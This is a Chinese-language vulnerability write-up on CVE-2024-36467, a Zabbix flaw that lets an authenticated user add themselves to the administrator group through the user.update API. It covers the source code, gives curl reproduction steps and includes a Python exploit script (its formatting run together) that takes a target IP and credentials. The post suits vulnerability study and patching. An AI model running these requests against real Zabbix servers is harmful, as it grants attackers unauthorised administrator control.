CVE-2024-36467 Zabbix权限提升
漏洞描述
- 在Zabbix中,具有API访问权限的已认证用户(例如具有默认用户角色的用户)可以通过调用user.update API接口,将自己添加到任何用户组(如Zabbix管理员组)。
- 然而,用户无法添加到已被禁用或具有受限GUI访问权限的用户组。
- 该漏洞源于缺乏对用户组添加操作的授权检查。
影响版本
- Zabbix 5.0.42
- Zabbix 6.0.32
- Zabbix 6.4.17
- Zabbix 7.0.1rc1
源码分析
在validateUpdate 函数中,调用了第 542 行第 1109 行的 checkHimself 函数。checkYourself 函数包含以下代码:
private function checkHimself(array $users) {
foreach ($users as $user) {
if (bccomp($user['userid'], self::$userData['userid']) == 0) {
if (array_key_exists('roleid', $user) && $user['roleid'] !=
self::$userData['roleid']) {
self::exception(ZBX_API_ERROR_PARAMETERS, _('User cannot change
own role.'));
}
if (array_key_exists('usrgrps', $user)) {
$db_usrgrps = DB::select('usrgrp', [
'output' => ['gui_access', 'users_status'],
'usrgrpids' => zbx_objectValues($user['usrgrps'], 'usrgrpid')
]);
foreach ($db_usrgrps as $db_usrgrp) {
if ($db_usrgrp['gui_access'] == GROUP_GUI_ACCESS_DISABLED
|| $db_usrgrp['users_status'] ==
GROUP_STATUS_DISABLED) {
self::exception(ZBX_API_ERROR_PARAMETERS,
_('User cannot add himself to a disabled group or a
group with disabled GUI access.')
);
}
}
}
break;
}
}
}
- if (bccomp($user['userid'], self::$userData['userid']) == 0) :bccomp 比较当前遍历的用户 ID 和当前登录用户 ID(self::$userData['userid']),如果匹配(返回 0),说明用户在尝试修改自己的数据。
- if (array_key_exists('roleid', $user) && $user['roleid'] != self::$userData['roleid']) {self::exception(ZBX_API_ERROR_PARAMETERS, _('User cannot change own role.'));}:当要修改的用户id与当前用户的id不一致时将会报错。即只能修改自己的数据。
if (array_key_exists('usrgrps', $user)) {$db_usrgrps = DB::select('usrgrp', ['output' => ['gui_access', 'users_status'],'usrgrpids' => zbx_objectValues($user['usrgrps'], 'usrgrpid')]);这段代码用于检查用户组权限,如果请求中包含 usrgrps(用户组变更),就从数据库查询这些组的 gui_access 和 users_status 字段。
foreach ($db_usrgrps as $db_usrgrp) {if ($db_usrgrp['gui_access'] == GROUP_GUI_ACCESS_DISABLED|| $db_usrgrp['users_status'] == GROUP_STATUS_DISABLED) {self::exception(ZBX_API_ERROR_PARAMETERS, _('User cannot add himself to a disabled group or a group with disabled GUI access.'));}
}这段代码用于验证组的状态,如果处于禁用或禁止GUI访问状态,就会报错。
从以上代码可以看出用户只能修改自己的数据,在用户组变更时没有对用户的权限进行校验,只检查用户组的状态,因此用户可以将自己添加进任意组中。
复现步骤
(1)尝试登陆,如果登陆成功会返回登陆凭证
curl --request POST \
--url 'http://192.168.116.134/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{"jsonrpc":"2.0","method":"user.login","params":
{"username":"user","password":"yong1234"},"id":1}'
(2)修改当前用户的用户组
原本user属于Guests群组
输入命令
curl --request POST \
--url 'http://192.168.116.134/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{"jsonrpc":"2.0","method":"user.update","params":
{"userid":"3","usrgrps":[{"usrgrpid":"7"}]},"auth":"7f33020f67fc24a13bf37b72e974d73a","id":1}'发现user的群组已经更改为管理员群组了
EXP
import requests
import jsondef get_auth(target, username, password):login_url = f"http://{target}/api_jsonrpc.php"headers = {'Content-Type': 'application/json-rpc','User-Agent': 'Zabbix-Privilege Escalation-Scanner'}login_data = {"jsonrpc": "2.0","method": "user.login","params": {"username": username,"password": password},"id": 1}try:login_response = requests.post(login_url,headers=headers,data=json.dumps(login_data),timeout=10,verify=False)if login_response.status_code != 200:print(f"[-] 登录失败,HTTP状态码: {login_response.status_code}")return Falselogin_result = login_response.json()auth_token = login_result['result']print(f"[+] 成功获取认证令牌: {auth_token}")return auth_tokenexcept requests.exceptions.RequestException as e:print(f"[-] 请求失败: {str(e)}")return Falseexcept json.JSONDecodeError as e:print(f"[-] JSON解析失败: {str(e)}")return Falsedef update_user_group(target, auth_token):update_url = f"http://{target}/api_jsonrpc.php"headers = {'Content-Type': 'application/json-rpc','User-Agent': 'Zabbix-Privilege Escalation-Scanner'}update_data = {"jsonrpc": "2.0","method": "user.update","params": {"userid": "3","usrgrps": [{"usrgrpid": "7"}]},"auth": auth_token,"id": 1}try:response = requests.post(update_url,headers=headers,data=json.dumps(update_data),timeout=10,verify=False)update_result = response.json()if response.status_code != 200:print(f"[-] 更改失败,HTTP状态码: {response.status_code}")return Falseelse:print(update_result)except requests.exceptions.RequestException as e:print(f"[-] 更改请求失败: {str(e)}")return Falseexcept json.JSONDecodeError as e:print(f"[-] JSON解析失败: {str(e)}")return Falseif __name__ == '__main__':target = input("请输入目标IP:")username = input("请输入用户名:")password = input("请输入密码:")auth_token = get_auth(target, username, password)update_user_group(target, auth_token)
相关文章:
CVE-2024-36467 Zabbix权限提升
漏洞描述 在Zabbix中,具有API访问权限的已认证用户(例如具有默认用户角色的用户)可以通过调用user.update API接口,将自己添加到任何用户组(如Zabbix管理员组)。然而,用户无法添加到已被禁用或…...
Dify中的自定义模型插件开发例子:以xinference为例
本文使用Dify v1.0.0-beta.1版本。模型插件结构基本是模型供应商(模型公司,比如siliconflow、xinference)- 模型分类(模型类型,比如llm、rerank、speech2text、text_embedding、tts)- 具体模型(…...
crud方法命名示例
以下是基于表名dste_project_indicator(项目指标表)的完整命名示例,覆盖各类增删改查场景: 1. 表名与实体类映射 // 表名:dste_project_indicator // 实体类:DsteProjectIndicatorEntity public class Ds…...
尚硅谷redis7 33-36 redis持久化之RDB优缺点及数据丢失案例
官网说明优点: RDB是Redis数据的一个非常紧凑的单文件时间点表示,RDB文件非常适合备份。例如,您可能希望在最近的24小时内每小时旧档一次RDB文件,并在30天内每天保存一个RDB快照,这使您可以在发生来难时轻松恢复不同版本的数据集。RDB非常适合灾难恢复,它是一个可以…...
No such file or directory: ‘ffprobe‘
目录 详细信息: 解决方法: No such file or directory: ffprobe 详细信息: File "/usr/local/lib/python3.10/dist-packages/framepump/framepump.py", line 168, in get_duration return float(ffmpeg.probe(video_path)[form…...
计算机网络-WebSocket/DNS/Cookie/Session/Token/Jwt/Nginx
文章目录 WebSocketDNS什么是dns域名解析底层协议 cookie/sessionToken/JWTNginx WebSocket 一种网络通信协议,允许在单个 TCP(半双工) 连接上进行全双工通信(客户端和服务器可同时双向传输数据)。 HTTP是基于请求-响…...
功能“递归模式”在 C# 7.3 中不可用,请使用 8.0 或更高的语言版本的一种兼容处理方案
原程序: internal class ControllerParameterCreator : IParameterCreator {private Controller controller;public ControllerParameterCreator(Controller controller){this.controller controller;}public Parameter CreateSystem(string name, int unused){re…...
第4章-操作系统知识
存储管理 固定分区:一种静态分区方式请求分页存储管理覆盖技术:覆盖技术是指让作业中不同时运行的程序模块共同使用同一主存区域。...
将网页带格式转化为PDF
# 一、安装插件 SingleFile | 将完整的页面保存到一个 HTML 文件中 – 下载 🦊 Firefox 扩展(zh-CN) 打开火狐浏览器,安装上面的插件 # 二、下载html单文件 打开对应的网页,点击插件下载对应的html文件 # 三、打开…...
【ArcGIS】ArcGIS AI 助手----复现
github地址 korporalK/Archer-GIS-AI-Assitant:Archer 在 ArcGIS Pro 中将自然语言命令转换为自动化 GIS 工作流。它使用代理框架(计划-验证-执行)构建并由 LLM 提供支持,可简化空间分析、减少手动工作并使 GIS 更易于访问。Arch…...
)
使用 FFmpeg 将视频转换为高质量 GIF(保留原始尺寸和帧率)
在制作教程动图、产品展示、前端 UI 演示等场景中,我们经常需要将视频转换为体积合适且清晰的 GIF 动图。本文将详细介绍如何使用 FFmpeg 工具将视频转为高质量 GIF,包括: ✅ 保留原视频尺寸或自定义缩放✅ 保留原始帧率或自定义帧率✅ 使用调色板优化色彩质量✅ 降低体积同…...
《Java vs Go vs C++ vs C:四门编程语言的深度对比》
引言 从底层硬件操作到云端分布式系统,Java、Go、C 和 C 四门语言各自占据不同生态位。本文从设计哲学、语法范式、性能特性、应用场景等维度进行对比,为开发者提供技术选型参考。 一、设计哲学与历史定位…...
充电枪IEC62196/EN 62196测试内容
充电枪IEC62196/EN 62196测试内容 一、机械性能测试 插拔力测试 交流充电接口的插入/拔出力需≤100N,直流接口≤140N。若使用助力装置,操作力仍需满足上述要求。 测试方法:通过弹簧秤或专用试验机(如Sun-CB设备)测…...
有效的字母异位符--LeetCode
题目 给定两个字符串 s 和 t ,编写一个函数来判断 t 是否是 s 的 字母异位词。 示例 1: 输入: s "anagram", t "nagaram" 输出: true示例 2: 输入: s "rat", t "car" 输出: false 思路一:排序 t 是 s …...
SAP ERP 系统拆分的七大挑战
在企业变革或管理运营风险时,剥离IT系统能带来显著效益,但SAP ERP系统的复杂性使得这项工作充满挑战。如果管理不当,可能会导致数据不一致、运营中断、合规风险和意外成本。由于SAP ERP系统深度集成于企业核心业务流程中,其拆分工…...
AcrelEMS 3.0智慧能源管理平台:构建企业微电网数智化中枢
安科瑞电气顾强 在"双碳"目标驱动下,企业能源管理正从粗放式运营向精细化、智能化转型。AcrelEMS 3.0智慧能源管理平台以微电网为核心载体,通过"感知-分析-决策-控制"的全链路数字化能力,助力工商企业、医疗机构、教育机…...
【HTML-12】HTML表格常用属性详解:从基础到高级应用
表格是HTML中最强大且常用的元素之一,它能够以结构化的方式展示数据。本文将全面介绍HTML表格的常用属性,帮助您创建美观、响应式且语义化的数据表格。 1. HTML表格基础结构 在深入了解属性之前,我们先回顾一下HTML表格的基本结构ÿ…...
Word转PDF--自动生成目录
1-Word文档中已经包含自动生成的目录; 2-选择“文件”; 3-另存为,PDF; 4-选择“选项”按钮,在弹出的窗口中,勾选“创建书签时使用标题”。...
MySQL组合索引优化策略
优化MySQL组合索引需要综合考虑查询模式、索引结构及数据库特性。以下是关键优化策略及示例: 1. 遵循最左前缀原则 策略:确保查询条件包含组合索引最左侧列。示例:索引(a,b,c)生效场景:WHERE a1 AND b2 -- ✔️ 使用a和b W…...
Spring MVC 的的核心原理与实践指南
一、Spring MVC 概述 Spring MVC 是 Spring 框架中的一个重要模块,用于构建基于 Java 的 Web 应用程序。它遵循模型-视图-控制器(MVC)设计模式,提供了一种结构化的方式来开发灵活、松耦合的 Web 应用。 Spring MVC 的特点…...
轻量级视觉语言模型 Dolphin:高效精准的文档结构化解析利器
在数字化办公和学术研究日益普及的今天,如何高效、准确地处理各类文档图像成为了一个亟需解决的问题。Dolphin 应运而生,作为一款基于异构锚点提示的多模态文档图像解析模型,它不仅打破了传统手动整理文档的繁琐流程,更以远超主流…...
如何安全配置数据库(MySQL/PostgreSQL/MongoDB)
数据库是许多应用程序的核心组成部分,因此保护数据库的安全性至关重要。无论是MySQL、PostgreSQL还是MongoDB,都需要经过适当的安全配置才能防止潜在的安全威胁。本文将介绍如何安全配置这些流行的数据库管理系统,以确保数据的保密性、完整性…...
将 Docker 镜像从服务器A迁移到服务器B的方法
在日常工作中,我们有时会需要将服务器 A上的镜像上传至服务器B上,下面给出具体操作方式,以镜像 postgres:15 为例进行讲解。 首先在服务器A上拉取 镜像 postgres:15 ,命令如下: docker pull postgres:15下面再将服务…...
git merge解冲突后,add、continue提交
git merge解冲突后,add、continue提交 git merge操作冲突后,需要手动解冲突,解完冲突后,需要: git add . 然后,进入一般的正常git代码提交流程。 git合并‘merge’其他分支的个别文件到当前branch_gitbash 合并branc…...
Lines of Thought in Large Language Models
Lines of Thought in Large Language Models 《Lines of Thought in Large Language Models》(大语言模型中的思维链)聚焦于分析大语言模型(LLMs)在生成文本时,其内部向量轨迹的统计特性。 核心目标是揭示LLMs复杂的“思维过程”(即文本生成时的隐藏状态变化)能否被简…...
八股战神-JVM知识速查
1.JVM组成 JVM由那些部分组成,运行流程是什么? JVM是Java程序的运行环境 组成部分: 类加载器:加载字节码文件到内存 运行时数据区:包括方法区,堆,栈,程序计数器,本地…...
机试 | STL | string | 文字处理软件
题目: P5734 【深基6.例6】文字处理软件 - 洛谷 不使用库函数 #include<stdio.h> #include <iostream> #include<string> using namespace std;int main() {int q;//第一行输入一个正整数q,表示操作次数string content;//第二行输入一…...
运动规划实战案例 | 图解基于状态晶格(State Lattice)的路径规划(附ROS C++/Python仿真)
目录 1 控制采样 vs 状态采样2 State Lattice路径规划2.1 算法流程2.2 Lattice运动基元生成2.3 几何代价函数2.4 运动学约束启发式 3 算法仿真3.1 ROS C仿真3.2 Python仿真 1 控制采样 vs 状态采样 控制采样的技术路线源自经典的运动学建模思想。这种方法将机器人的控制指令空…...
深入浅出对抗学习:概念、攻击、防御与代码实践
深入浅出对抗学习:概念、攻击、防御与代码实践 近年来,深度学习在图像识别、自然语言处理等领域取得了巨大成功。然而,研究表明,这些看似强大的模型却异常脆弱,容易受到**对抗样本(Adversarial Examples&a…...
Neo4j(二) - 使用Cypher操作Neo4j
文章目录 前言一、Cypher简介二、数据库操作1. 创建数据库2. 查看数据库3. 删除数据库4. 切换数据库 三、节点、关系及属性操作1. 创建节点与关系1.1 语法1.2 示例 2. 查询数据2.1 语法2.2 示例 3. 更新数据3.1 语法3.2 示例 4. 删除节点与关系4.1 语法4.2 示例 5. 合并数据5.1…...